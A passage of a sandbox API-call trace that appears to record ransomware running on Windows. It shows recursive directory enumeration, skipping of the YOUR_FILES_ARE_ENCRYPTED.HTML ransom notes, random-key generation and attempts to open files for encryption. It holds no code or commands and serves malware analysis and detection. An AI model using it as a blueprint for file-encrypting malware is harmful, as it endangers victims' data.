nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.803] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0169.803] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.803] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaa7760, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", 
cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.803] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.803] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0169.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.803] GetProcessHeap () returned 0x270000 [0169.804] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.804] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaa7760, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaa7760, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0169.804] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.804] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0169.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all 
users\\microsoft\\device stage\\device\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.804] GetProcessHeap () returned 0x270000 [0169.805] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.805] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Task", cAlternateFileName="")) returned 1 [0169.805] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned 50 [0169.805] GetProcessHeap () returned 0x270000 [0169.805] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.805] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" [0169.805] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*" [0169.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, 
ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.806] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.806] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbb19b80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.806] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0169.806] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.806] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, 
ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0169.806] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 89 [0169.806] GetProcessHeap () returned 0x270000 [0169.806] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.806] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0169.806] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*" [0169.806] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", 
cAlternateFileName="")) returned 0x42f3200 [0169.806] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.806] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.806] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 95 [0169.806] GetProcessHeap () returned 0x270000 [0169.806] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0169.809] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0169.809] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*" [0169.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0169.809] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbacd8c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.809] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83da3d14, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x842daf62, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x83da3d14, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0169.809] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 108 [0169.809] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.810] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.810] lstrlenW (lpString=".xml") returned 4 [0169.810] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.810] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0169.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.810] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbacd8c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.810] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0169.810] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.810] FindNextFileW (in: hFindFile=0x42f3240, 
lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbacd8c0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbacd8c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.810] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0169.810] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0169.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.810] GetProcessHeap () returned 0x270000 [0169.811] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0169.811] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647bcc04, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647bcc04, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x112e5ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x60, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0169.811] 
wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 100 [0169.811] lstrcmpW (lpString1="folder.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.811] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0169.811] lstrlenW (lpString=".ico") returned 4 [0169.811] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0169.811] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6487b2e4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x6487b2e4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x112e5ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x0, dwReserved1=0x60, cFileName="netfol.ico", cAlternateFileName="")) returned 1 [0169.811] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 100 [0169.811] lstrcmpW (lpString1="netfol.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.811] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0169.812] lstrlenW (lpString=".ico") returned 4 [0169.812] PathFindExtensionW (pszPath="netfol.ico") returned=".ico" [0169.812] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647e2d64, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647e2d64, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x14668, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="pictures.ico", cAlternateFileName="")) returned 1 [0169.812] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\pictures.ico") returned 102 [0169.812] lstrcmpW (lpString1="pictures.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.812] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0169.812] lstrlenW (lpString=".ico") returned 4 [0169.812] PathFindExtensionW (pszPath="pictures.ico") returned=".ico" [0169.812] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x647bcc04, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x647bcc04, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0169.812] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml") returned 102 [0169.812] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.812] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.812] lstrlenW (lpString=".xml") returned 4 [0169.812] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.812] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device 
stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.812] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64808ec4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64808ec4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x113582dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xcaa9, dwReserved0=0x0, dwReserved1=0x60, cFileName="ringtones.ico", cAlternateFileName="")) returned 1 [0169.812] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 103 [0169.812] lstrcmpW (lpString1="ringtones.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.813] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0169.813] lstrlenW (lpString=".ico") returned 4 [0169.813] PathFindExtensionW (pszPath="ringtones.ico") returned=".ico" [0169.813] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64808ec4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64808ec4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0x0, dwReserved1=0x60, cFileName="settings.ico", cAlternateFileName="")) returned 1 [0169.813] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico") returned 102 [0169.813] lstrcmpW (lpString1="settings.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.813] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0169.813] lstrlenW (lpString=".ico") returned 4 [0169.813] PathFindExtensionW (pszPath="settings.ico") returned=".ico" [0169.813] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6482f024, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x6482f024, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xc04b, dwReserved0=0x0, dwReserved1=0x60, cFileName="sync.ico", cAlternateFileName="")) returned 1 [0169.813] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico") returned 98 [0169.813] lstrcmpW (lpString1="sync.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.813] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0169.813] lstrlenW (lpString=".ico") returned 4 [0169.813] PathFindExtensionW (pszPath="sync.ico") returned=".ico" [0169.813] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1137e43c, ftCreationTime.dwHighDateTime=0x1c9ea14, 